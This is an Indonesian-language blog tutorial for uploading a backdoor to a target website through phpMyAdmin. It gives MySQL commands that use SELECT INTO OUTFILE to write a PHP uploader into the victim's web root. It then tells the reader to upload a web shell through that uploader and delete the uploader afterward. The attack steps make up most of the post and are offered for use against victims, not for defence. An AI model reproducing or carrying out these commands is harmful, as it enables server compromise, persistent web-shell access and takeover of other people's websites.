Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Upload Backdoor Lewat MySQL Database (phpMyAdmin)
Profil Info Written By
1:45 AM
Mungkin sudah banyak dibahas di google ya. Namun berhubung lagi gak sibuk coba bikin artikelnya aja barangkali ada yang kurang paham dengan tutor google. Jadi upload shell lewat phpmyadmin itu sangat mungkin, tentu saja dengan syarat syarat tertentu.

berikut syarat syarat untuk bisa mengupload shell via phpmyadmin :
  1. User mysql root atau yag setara root (have all privileges)
  2. Tau lokasi atau direktori dari website target berjalan.

Oke dalam tutorial ini saya sudah memenuhi kedua syarat tersebut. User root dan tau lokasi dari web. DI tutorial ini sebagai contoh saya menggunakan Windows Server. Untuk linux server caranya sama saja, hanya sesuaikan saja direktorinya.
Oke langsung saja :
Masuk ke menu command lalu masukkan kode berikut :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload2.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/server/htdocs/upload2.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Ubah yang dicetak tebal dengan direktori dari website. Perintah ini digunakan untuk membuat form upload di website korban dengan nama upload2.php
Oke lagi. Sekarang masukkan kode berikut :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/server/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "
<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "";?>');
SELECT * INTO OUTFILE 'C:/server/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Perintah ini untuk membuat fungsi upload dari file upload2.php .
Oke sekarang kita coba panggil file nya lewat  web browser.
Sesuaikan dengan path yang kalian masukkan di command mysql nya. Yang dipanggil adalah upload2.php
nah kalian akan mendapat sebuah uploader. Tinggal upload shell kalian lewat situ, dan hapus uploadernya.
Oke sekian tutorial kali ini, jika kurang jelas silahkan komentar.
Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Dapatkan Tips Menarik Setiap Harinya!

  • Dapatkan tips dan trik yang belum pernah kamu tau sebelumnya
  • Jadilah orang pertama yang mengetahui hal-hal baru di dunia teknologi
  • Dapatkan Ebook Gratis: Cara Dapat 200 Juta / bulan dari AdSense

0 Response to " Upload Backdoor Lewat MySQL Database (phpMyAdmin)"

Post a Comment

Catatan Untuk Para Jejaker
  • Mohon Tinggalkan jejak sesuai dengan judul artikel.
  • Tidak diperbolehkan untuk mempromosikan barang atau berjualan.
  • Dilarang mencantumkan link aktif di komentar.
  • Komentar dengan link aktif akan otomatis dihapus
  • *Berkomentarlah dengan baik, Kepribadian Anda tercemin saat berkomentar.

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel